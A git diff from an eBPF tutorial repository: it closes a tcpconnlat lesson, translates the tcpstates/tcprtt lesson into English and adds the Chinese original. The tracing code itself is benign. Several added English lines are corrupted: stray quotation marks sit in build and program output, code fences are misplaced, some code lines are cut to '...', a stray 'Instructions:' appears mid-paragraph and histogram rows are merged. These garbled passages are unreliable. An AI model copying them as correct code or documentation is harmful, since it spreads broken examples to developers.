`tcp_v6_connect`, the process information (process name, process ID, and current timestamp) of the initiating connection request is recorded and stored in the `start` map with the socket structure as the key. - -```c -static int trace_connect(struct sock *sk) -{ - u32 tgid = bpf_get_current_pid_tgid() >> 32; - struct piddata piddata = {}; - - if (targ_tgid && targ_tgid != tgid) - return 0; - - bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm)); - piddata.ts = bpf_ktime_get_ns(); - piddata.tgid = tgid; - bpf_map_update_elem(&start, &sk, &piddata, 0); - return 0; -} -``` - -When the TCP state machine processes the SYN-ACK packet, i.e., when the connection is established, the kprobe handling function `handle_tcp_rcv_state_process` of `tcp_rcv_state_process` is triggered. In this function, it first checks if the socket state is `SYN-SENT`. If it is, it looks up the process information for the socket in the `start` map. Then it calculates the time interval from the initiation of the connection to the present and sends this time interval, process information, and TCP connection details (source port, destination port, source IP, destination IP, etc.) as an event to user space using the `bpf_perf_event_output` function. - -```c -static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) -{ - struct piddata *piddatap; - struct event event = {}; - s64 delta; - u64 ts; - - if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT) - return 0; - - piddatap = bpf_map_lookup_elem(&start, &sk); - if (!piddatap) - return 0; - - ts = bpf_ktime_get_ns(); - delta = (s64)(ts - piddatap->ts); - if (delta < 0) - goto cleanup; - - event.delta_us = delta / 1000U; - if (targ_min_us && event.delta_us < targ_min_us) - goto cleanup; - __builtin_memcpy(&event.comm, piddatap->comm, - sizeof(event.comm)); - event.ts_us = ts / 1000; - event.tgid = piddatap->tgid; - event.lport = BPF_CORE_READ(sk, __sk_common.skc_num); - event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport); - event.af = BPF_CORE_READ(sk, __sk_common.skc_family); - if (event.af == AF_INET) { - event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr); - event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr); - } else { - BPF_CORE_READ_INTO(&event.saddr_v6, sk, - __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); - BPF_CORE_READ_INTO(&event.daddr_v6, sk, - __sk_common.skc_v6_daddr.in6_u.u6_addr32); - } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, - &event, sizeof(event)); - -cleanup: - bpf_map_delete_elem(&start, &sk); - return 0; -} -``` - -This program uses a while loop to repeatedly poll the perf event buffer. If there is an error during polling (e.g., due to a signal interruption), an error message will be printed. This polling process continues until an exit flag `exiting` is received. - -Next, let's take a look at the `handle_event` function, which handles every eBPF event sent from the kernel to user space: - -```c -void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { - const struct event* e = data; - char src[INET6_ADDRSTRLEN]; - char dst[INET6_ADDRSTRLEN]; - union { - struct in_addr x4; - struct in6_addr x6; - } s, d; - static __u64 start_ts; - - if (env.timestamp) { - if (start_ts == 0) - start_ts = e->ts_us; - printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0); - } - if (e->af == AF_INET) { - s.x4.s_addr = e->saddr_v4; - d.x4.s_addr = e->daddr_v4; - } else if (e->af == AF_INET6) { - memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr)); - memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr)); - } else { - fprintf(stderr, "broken event: event->af=%d", e->af); - return; - } - - if (env.lport) { - printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid, - e->comm, e->af == AF_INET ? 4 : 6, - inet_ntop(e->af, &s, src, sizeof(src)), e->lport, - inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), - e->delta_us / 1000.0); - } else { - printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm, - e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)), - inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport), - e->delta_us / 1000.0); - } -} -``` - -The `handle_event` function takes arguments including the CPU number, a pointer to the data, and the size of the data. The data is a `event` structure that contains information about TCP connections computed in the kernel space. - -First, it compares the timestamp of the received event with the start timestamp (if available) to calculate the relative time of the event, and then prints it. Next, it converts the source address and destination address from network byte order to host byte order based on the IP address type (IPv4 or IPv6). - -Finally, depending on whether the user chooses to display the local port, it prints the process ID, process name, IP version, source IP address, local port (if available), destination IP address, destination port, and connection establishment time. This connection establishment time is calculated in the eBPF program running in the kernel space and sent to the user space. - -## Compilation and Execution - -```console -$ make -... - BPF .output/tcpconnlat.bpf.o".GEN-SKEL .output/tcpconnlat.skel.h - CC .output/tcpconnlat.o - BINARY tcpconnlat -$ sudo ./tcpconnlat -PID COMM IP SADDR DADDR DPORT LAT(ms) -222564 wget 4 192.168.88.15 110.242.68.3 80 25.29 -222684 wget 4 192.168.88.15 167.179.101.42 443 246.76 -222726 ssh 4 192.168.88.15 167.179.101.42 22 241.17 -222774 ssh 4 192.168.88.15 1.15.149.151 22 25.31 -``` - -Source code: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat) - -References: - -- [tcpconnlat](https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.c) in bcc - -## Summary - -In this eBPF introductory tutorial, we learned how to use eBPF to track and measure the latency of TCP connections. We first explored how eBPF programs can attach to specific kernel functions in kernel-space and capture the start and end times of connection establishment to calculate latency. - -We also learned how to use BPF maps to store and retrieve data in kernel-space, enabling data sharing among different parts of the eBPF program. Additionally, we discussed how to use perf events to send data from kernel-space to user-space for further processing and display. - -In user-space, we introduced the usage of libbpf library APIs, such as perf_buffer__poll, to receive and process data sent from the kernel-space. We also demonstrated how to parse and print this data in a human-readable format. - -If you are interested in learning more about eBPF and its practical applications, please refer to the official documentation of eunomia-bpf: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). You can also visit our tutorial code repository at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) for more examples and complete tutorials. - -In the upcoming tutorials, we will dive deeper into advanced features of eBPF, such as tracing the path of network packets and fine-grained system performance monitoring. We will continue to share more content on eBPF development practices to help you better understand and master eBPF technology. We hope these resources will be valuable in your learning and practical journey with eBPF. - -> The original link of this article: diff --git a/src/14-tcpstates/README.md b/src/14-tcpstates/README.md index 6bf2c8d..189474d 100644 --- a/src/14-tcpstates/README.md +++ b/src/14-tcpstates/README.md @@ -1,16 +1,16 @@ -# eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT +# eBPF Tutorial by Example 14: Recording TCP Connection Status and TCP RTT -eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. -在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:`tcpstates` 和 `tcprtt`。`tcpstates` 用于记录 TCP 连接的状态变化,而 `tcprtt` 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。 +In this article of our eBPF Tutorial by Example series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP. -## `tcprtt` 与 `tcpstates` +## `tcprtt` and `tcpstates` -网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 `tcprtt` 这个工具。`tcprtt` 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。 +Network quality is crucial in the current Internet environment. There are many factors that affect network quality, including hardware, network environment, and the quality of software programming. To help users better locate network issues, we introduce the tool `tcprtt`. `tcprtt` can monitor the Round-Trip Time of TCP connections, evaluate network quality, and help users identify potential problems. -当 TCP 链接建立时,`tcprtt` 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,`tcprtt` 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,`tcprtt` 会通过用户态代码,将收集的信息以图形化的方式展示给用户。 +When a TCP connection is established, `tcprtt` automatically selects the appropriate execution function based on the current system conditions. In the execution function, `tcprtt` collects various basic information of the TCP connection, such as source address, destination address, source port, destination port, and time elapsed, and updates this information to a histogram-like BPF map. After the execution is completed, `tcprtt` presents the collected information graphically to users through user-mode code. -`tcpstates` 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,`tcpstates` 可以打印出类似以下的输出: +`tcpstates` is a tool specifically designed to track and print changes in TCP connection status. It can display the duration of TCP connections in each state, measured in milliseconds. For example, for a single TCP session, `tcpstates` can print output similar to the following: ```sh SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS @@ -21,13 +21,13 @@ ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FI ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006 ``` -以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。 +In the above output, the most time is spent in the ESTABLISHED state, which indicates that the connection has been established and data transmission is in progress. The transition from this state to the FIN_WAIT1 state (the beginning of connection closure) took 176.042 milliseconds. -在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。 +In our upcoming tutorials, we will delve deeper into these two tools, explaining their implementation principles, and hopefully, these contents will help you in your work with eBPF for network and performance analysis. -## tcpstate +## tcpstate eBPF code -由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstate 的 eBPF 代码: +Due to space constraints, here we mainly discuss and analyze the corresponding eBPF kernel-mode code implementation. The following is the eBPF code for tcpstate: ```c const volatile bool filter_by_sport = false; @@ -44,7 +44,8 @@ struct { struct { __uint(type, BPF_MAP_TYPE_HASH); __uint(max_entries, MAX_ENTRIES); - __type(key, __u16); + ... +```__type(key, __u16); __type(value, __u16); } dports SEC(".maps"); @@ -108,7 +109,6 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32); } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); if (ctx->newstate == TCP_CLOSE) @@ -120,23 +120,25 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) } ``` -`tcpstates`主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。 +The `tcpstates` program relies on eBPF Tracepoints to capture the state changes of TCP connections, in order to track the time spent in each state of the TCP connection. -### 定义 BPF Maps +### Define BPF Maps -在`tcpstates`程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。`sports`和`dports`分别用于存储源端口和目标端口,用于过滤 TCP 连接;`timestamps`用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;`events`则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。 +In the `tcpstates` program, several BPF Maps are defined, which are the primary way of interaction between the eBPF program and the user-space program. `sports` and `dports` are used to store the source and destination ports for filtering TCP connections; `timestamps` is used to store the timestamps for each TCP connection to calculate the time spent in each state; `events` is a map of type `perf_event`, used to send event data to the user-space. -### 追踪 TCP 连接状态变化 +### Trace TCP Connection State Changes -程序定义了一个名为`handle_set_state`的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到`sock/inet_sock_set_state`这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行`handle_set_state`函数。 +The program defines a function called `handle_set_state`, which is a program of type tracepoint and is mounted on the `sock/inet_sock_set_state` kernel tracepoint. Whenever the TCP connection state changes, this tracepoint is triggered and the `handle_set_state` function is executed. -在`handle_set_state`函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从`timestamps`map 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过`bpf_perf_event_output`函数将该 event 发送到用户态。 +In the `handle_set_state` function, it first determines whether the current TCP connection needs to be processed through a series of conditional judgments, then retrieves the previous timestamp of the current connection from the `timestamps` map, and calculates the time spent in the current state. Then, the program places the collected data in an event structure and sends the event to the user-space using the `bpf_perf_event_output` function. -### 更新时间戳 +### Update Timestamps -最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从`timestamps`map 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。 +Finally, based on the new state of the TCP connection, the program performs different operations: if the new state is TCP_CLOSE, it means the connection has been closed and the program deletes the timestamp of that connection from the `timestamps` map; otherwise, the program updates the timestamp of the connection. -用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据: +## User-Space Processing for tcpstate + +The user-space part is mainly about loading the eBPF program using libbpf and receiving event data from the kernel using perf_event: ```c static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { @@ -166,33 +168,28 @@ static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { } else { printf( "%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n", - e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport, - tcp_states[e->oldstate], tcp_states[e->newstate], - (double)e->delta_us / 1000); - } -} + ... ``` -`handle_event`就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。 +handle_event` is a callback function that is called by perf_event. It handles new events that arrive in the kernel. -在`handle_event`函数中,我们首先通过`inet_ntop`函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。 +In the `handle_event` function, we first use the `inet_ntop` function to convert the binary IP address to a human-readable format. Then, based on whether the wide format is needed or not, we print different information. This information includes the timestamp of the event, source IP address, source port, destination IP address, destination port, old state, new state, and the time spent in the old state. -这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。 +This allows users to see the changes in TCP connection states and the duration of each state, helping them diagnose network issues. -总结起来,用户态部分的处理主要涉及到了以下几个步骤: +In summary, the user-space part of the processing involves the following steps: -1. 使用 libbpf 加载并运行 eBPF 程序。 -2. 设置回调函数来接收内核发送的事件。 -3. 处理接收到的事件,将其转换成人类可读的格式并打印。 +1. Use libbpf to load and run the eBPF program. +2. Set up a callback function to receive events sent by the kernel. +3. Process the received events, convert them into a human-readable format, and print them. -以上就是`tcpstates`程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。 +The above is the main implementation logic of the user-space part of the `tcpstates` program. Through this chapter, you should have gained a deeper understanding of how to handle kernel events in user space. In the next chapter, we will introduce more knowledge about using eBPF for network monitoring. -### tcprtt +### tcprtt kernel eBPF code -在本章节中,我们将分析`tcprtt` eBPF 程序的内核态代码。`tcprtt`是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。 +In this section, we will analyze the kernel BPF code of the `tcprtt` eBPF program. `tcprtt` is a program used to measure TCP Round Trip Time (RTT) and stores the RTT information in a histogram. ```c - /// @sample {"interval": 1000, "type" : "log2_hist"} struct { __uint(type, BPF_MAP_TYPE_HASH); @@ -246,44 +243,50 @@ int BPF_PROG(tcp_rcv, struct sock *sk) } ``` -首先,我们定义了一个 hash 类型的 eBPF map,名为`hists`,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个`hist`结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。 +The code above declares a map called `hists`, which is a hash map used to store the histogram data. The `hists` map has a maximum number of entries defined as `MAX_ENTRIES`. -接着,我们定义了一个 eBPF 程序,名为`tcp_rcv`,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在`hists` map 中查找或者初始化对应的 histogram。 +The function `BPF_PROG(tcp_rcv, struct sock *sk)` is the entry point of the eBPF program for handling the `tcp_rcv_established` event. Within this function, the program retrieves various information from the network socket and checks if filtering conditions are met. Then, it performs operations on the histogram data structure. Finally, the program calculates the slot for the RTT value and updates the histogram accordingly. -接下来,我们读取 TCP 连接的`srtt_us`字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。 +This is the main code logic of the `tcprtt` eBPF program in kernel mode. The eBPF program measures the RTT of TCP connections and maintains a histogram to collect and analyze the RTT data.Instructions: -如果设置了`show_ext`参数,我们还会将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 +First, we define a hash type eBPF map called `hists`, which is used to store statistics information about RTT. In this map, the key is a 64-bit integer, and the value is a `hist` structure that contains an array to store the count of different RTT intervals. -通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。 +Next, we define an eBPF program called `tcp_rcv` which will be called every time a TCP packet is received in the kernel. In this program, we first filter TCP connections based on filtering conditions (source/destination IP address and port). If the conditions are met, we select the corresponding key (source IP, destination IP, or 0) based on the set parameters, and then look up or initialize the corresponding histogram in the `hists` map. -总结起来,`tcprtt` eBPF 程序的主要逻辑包括以下几个步骤: +Then, we read the `srtt_us` field of the TCP connection, which represents the smoothed RTT value in microseconds. We convert this RTT value to a logarithmic form and store it as a slot in the histogram. -1. 根据过滤条件对 TCP 连接进行过滤。 -2. 在`hists` map 中查找或者初始化对应的 histogram。 -3. 读取 TCP 连接的`srtt_us`字段,并将其转换为对数形式,存储到 histogram 中。 -4. 如果设置了`show_ext`参数,将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 +If the `show_ext` parameter is set, we also increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. -tcprtt 挂载到了内核态的 tcp_rcv_established 函数上: +With the above processing, we can analyze and track the RTT of each TCP connection to better understand the network performance. + +In summary, the main logic of the `tcprtt` eBPF program includes the following steps: + +1. Filter TCP connections based on filtering conditions. +2. Look up or initialize the corresponding histogram in the `hists` map. +3. Read the `srtt_us` field of the TCP connection, convert it to a logarithmic form, and store it in the histogram. +4. If the `show_ext` parameter is set, increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. + +`tcprtt` is attached to the kernel's `tcp_rcv_established` function: ```c void tcp_rcv_established(struct sock *sk, struct sk_buff *skb); ``` -这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于`ESTABLISHED`状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用: +This function is the main function in the kernel for processing received TCP data and is called when a TCP connection is in the `ESTABLISHED` state. The processing logic of this function includes a fast path and a slow path. The fast path is disabled in the following cases: -- 我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。 -- 收到了乱序的数据包。 -- 期待接收紧急数据。 -- 没有剩余的缓冲区空间。 -- 接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。 -- 数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。 -- 接收到了意外的TCP选项。 +- We have advertised a zero window - zero window probing can only be handled correctly in the slow path. +- Out-of-order data packets received. +- Expecting to receive urgent data. +- No remaining buffer space. +- Received unexpected TCP flags/window values/header lengths (detected by checking TCP header against the expected flags). +- Data is being transmitted in both directions. The fast path only supports pure senders or pure receivers (meaning the sequence number or acknowledgement value must remain unchanged). +- Received unexpected TCP options. -当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在`tcp_data_queue`函数中被开启。 +When these conditions are not met, it enters a standard receive processing, which follows RFC 793 to handle all cases. The first three cases can be ensured by setting the correct expected flags, while the remaining cases require inline checks. When everything is normal, the fast processing path is invoked in the `tcp_data_queue` function. -## 编译运行 +## Compilation and Execution -对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用: +For `tcpstates`, you can compile and run the libbpf application with the following command: ```console $ make @@ -295,8 +298,8 @@ $ make $ sudo ./tcpstates SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000 -ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794 -ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 +ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794". +"ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793 ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086 ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193 @@ -305,7 +308,7 @@ ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000 ``` -对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子: +For tcprtt, we can use eunomia-bpf to compile and run this example: Compile: @@ -313,7 +316,7 @@ Compile: docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者 +Or ```console $ ecc tcprtt.bpf.c tcprtt.h @@ -322,13 +325,12 @@ Generating export types... Packing ebpf object and config into package.json... ``` -运行: +Run: ```console $ sudo ecli run package.json -h A simple eBPF program - Usage: package.json [OPTIONS] Options: @@ -344,8 +346,8 @@ Options: -h, --help Print help -V, --version Print version -Built with eunomia-bpf framework. -See https://github.com/eunomia-bpf/eunomia-bpf for more information. +Built with eunomia-bpf framework.". +```See https://github.com/eunomia-bpf/eunomia-bpf for more information. $ sudo ecli run package.json key = 0 @@ -380,26 +382,27 @@ cnt = 0 32 -> 63 : 0 | | 64 -> 127 : 0 | | 128 -> 255 : 0 | | - 256 -> 511 : 0 | | - 512 -> 1023 : 11 |*************************** | + 256 -> 511 : 0 | |512 -> 1023 : 11 |*************************** | 1024 -> 2047 : 1 |** | 2048 -> 4095 : 0 | | 4096 -> 8191 : 16 |****************************************| 8192 -> 16383 : 4 |********** | ``` -完整源代码: +Complete source code: - -参考资料: +References: - [tcpstates](https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt) - [tcprtt](https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py) - [libbpf-tools/tcpstates]() -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。 +In this eBPF introductory tutorial, we learned how to use the tcpstates and tcprtt eBPF example programs to monitor and analyze the connection states and round-trip time of TCP. We understood the working principles and implementation methods of tcpstates and tcprtt, including how to store data using BPF maps, how to retrieve and process TCP connection information in eBPF programs, and how to parse and display the data collected by eBPF programs in user-space applications. -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。 +If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. The upcoming tutorials will further explore advanced features of eBPF, and we will continue to share more content about eBPF development practices. + +> The original link of this article: diff --git a/src/14-tcpstates/README.zh.md b/src/14-tcpstates/README.zh.md new file mode 100644 index 0000000..6bf2c8d --- /dev/null +++ b/src/14-tcpstates/README.zh.md @@ -0,0 +1,405 @@ +# eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT + +eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 + +在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:`tcpstates` 和 `tcprtt`。`tcpstates` 用于记录 TCP 连接的状态变化,而 `tcprtt` 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。 + +## `tcprtt` 与 `tcpstates` + +网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 `tcprtt` 这个工具。`tcprtt` 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。 + +当 TCP 链接建立时,`tcprtt` 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,`tcprtt` 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,`tcprtt` 会通过用户态代码,将收集的信息以图形化的方式展示给用户。 + +`tcpstates` 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,`tcpstates` 可以打印出类似以下的输出: + +```sh +SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS +ffff9fd7e8192000 22384 curl 100.66.100.185 0 52.33.159.26 80 CLOSE -> SYN_SENT 0.000 +ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 SYN_SENT -> ESTABLISHED 1.373 +ffff9fd7e8192000 22384 curl 100.66.100.185 63446 52.33.159.26 80 ESTABLISHED -> FIN_WAIT1 176.042 +ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT1 -> FIN_WAIT2 0.536 +ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006 +``` + +以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。 + +在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。 + +## tcpstate + +由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstate 的 eBPF 代码: + +```c +const volatile bool filter_by_sport = false; +const volatile bool filter_by_dport = false; +const volatile short target_family = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u16); + __type(value, __u16); +} sports SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, __u16); + __type(value, __u16); +} dports SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, struct sock *); + __type(value, __u64); +} timestamps SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(key_size, sizeof(__u32)); + __uint(value_size, sizeof(__u32)); +} events SEC(".maps"); + +SEC("tracepoint/sock/inet_sock_set_state") +int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) +{ + struct sock *sk = (struct sock *)ctx->skaddr; + __u16 family = ctx->family; + __u16 sport = ctx->sport; + __u16 dport = ctx->dport; + __u64 *tsp, delta_us, ts; + struct event event = {}; + + if (ctx->protocol != IPPROTO_TCP) + return 0; + + if (target_family && target_family != family) + return 0; + + if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport)) + return 0; + + if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport)) + return 0; + + tsp = bpf_map_lookup_elem(×tamps, &sk); + ts = bpf_ktime_get_ns(); + if (!tsp) + delta_us = 0; + else + delta_us = (ts - *tsp) / 1000; + + event.skaddr = (__u64)sk; + event.ts_us = ts / 1000; + event.delta_us = delta_us; + event.pid = bpf_get_current_pid_tgid() >> 32; + event.oldstate = 